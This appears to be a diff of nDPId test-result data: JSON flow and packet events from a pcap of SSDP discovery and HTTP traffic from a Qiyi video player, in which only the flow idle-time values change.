00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1467353187172,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353187172,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAgsAAAERAYPAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353187172,"flow_last_seen":1467353187172,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353187172,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353189325,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LaNAAIAGT77AqHMI3xpqE8VJAFB9cer6SbS1WFAYQTc4sgAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkZXIuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IERvd25sb2FkZXINCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} -01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1467353189328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":566,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":566,"pkt_l4_len":532,"thread_ts_msec":1467353189328,"pkt":"ABxCjnAxTF4M6gNlCABFAAIolNRAADgGLx3fGmoTwKhzCABQxUlJtLVYfXHrilAYAB9+agAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTcwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjM1OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQphcHA9ZWd1aSxla3JuLG5vZDMya3VpLG5vZDMya3JuDQpjb3VudD0xDQpjMD1Eb3dubG9hZEhlbHBlcg0KW0Rvd25sb2FkZXJdDQpEb3dubG9hZEhlbHBlcj1odHRwOi8vc3RhdGljLnFpeWkuY29tL2V4dC9jb21tb24vcWlzdTIvRG93bmxvYWRIZWxwZXIuZGxsO1N0YXJ0O1FJWUk="} -00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1467353189360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1467353189360,"pkt":"TF4M6gNlABxCjnAxCABFAAC8LbBAAIAGT63AqHMI3xpqE8VJAFB9ceuKSbS3WFAYQLejygAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL0Rvd25sb2FkSGVscGVyLmRsbCBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZGVyDQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353189363,"pkt":"TF4M6gNlABxCjnAxCABFAAOkLbJAAIAGvJjAqHMIymwO7MVIAFBYgFOZMQ8QiVAYQTddVQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODcwNTMmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUg
OC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1467353189325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353189325,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LaNAAIAGT77AqHMI3xpqE8VJAFB9cer6SbS1WFAYQTc4sgAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkZXIuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IERvd25sb2FkZXINCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1146,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189325,"flow_last_seen":1467353189325,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353189325,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloader.ini","code":0,"content_type":"","user_agent":"Downloader"}} +01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1467353189328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":566,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":566,"pkt_l4_len":532,"thread_ts_msec":1467353189328,"pkt":"ABxCjnAxTF4M6gNlCABFAAIolNRAADgGLx3fGmoTwKhzCABQxUlJtLVYfXHrilAYAB9+agAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOCBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogMTcwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjM1OjQzIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQphcHA9ZWd1aSxla3JuLG5vZDMya3VpLG5vZDMya3JuDQpjb3VudD0xDQpjMD1Eb3dubG9hZEhlbHBlcg0KW0Rvd25sb2FkZXJdDQpEb3dubG9hZEhlbHBlcj1odHRwOi8vc3RhdGljLnFpeWkuY29tL2V4dC9jb21tb24vcWlzdTIvRG93bmxvYWRIZWxwZXIuZGxsO1N0YXJ0O1FJWUk="} +00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1467353189360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1467353189360,"pkt":"TF4M6gNlABxCjnAxCABFAAC8LbBAAIAGT63AqHMI3xpqE8VJAFB9ceuKSbS3WFAYQLejygAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL0Rvd25sb2FkSGVscGVyLmRsbCBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZGVyDQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353189363,"pkt":"TF4M6gNlABxCjnAxCABFAAOkLbJAAIAGvJjAqHMIymwO7MVIAFBYgFOZMQ8QiVAYQTddVQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxODcwNTMmc2g9JnNxPSZzdz0mdD0zcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUg
OC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7560000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353189363,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353187053&sh=&sq=&sw=&t=3q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01016{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1467353189784,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":473,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":473,"pkt_l4_len":439,"thread_ts_msec":1467353189784,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHLI6UAAAER3rTAqAUm7\/\/\/+gdsB2wBt3SETk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVwbnA6cm9vdGRldmljZQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xOTIuMTY4LjUuMzg6Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjJmNjg4ZWNlLWMwYjEtNDEwNC1iOWU1LWNiY2VlNTAzZTZiNA0KVVNOOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0Ojp1cG5wOnJvb3RkZXZpY2UNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} 
00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
@@ -323,210 +323,210 @@ 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01027{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1467353189831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":482,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":482,"pkt_l4_len":448,"thread_ts_msec":1467353189831,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHUI6YAAAER3qrAqAUm7\/\/\/+gdsB2wBwIVJTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} 
01084{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1467353189909,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":525,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":525,"pkt_l4_len":491,"thread_ts_msec":1467353189909,"pkt":"AQBef\/\/6cBiLE+IdCABFAAH\/I6cAAAER3n7AqAUm7\/\/\/+gdsB2wB6x3GTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQ6OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpDYWNoZS1Db250cm9sOm1heC1hZ2U9OTAwDQpTZXJ2ZXI6TWljcm9zb2Z0LVdpbmRvd3MvNi4yIFVQblAvMS4wIFVQblAtRGV2aWNlLUhvc3QvMS4wDQpPUFQ6Imh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7IG5zPTAxDQowMS1OTFM6MDAyODViYzNjM2JhMjA3MDA3ZTFjM2I3NjIxYzg0NzYNCg0K"} 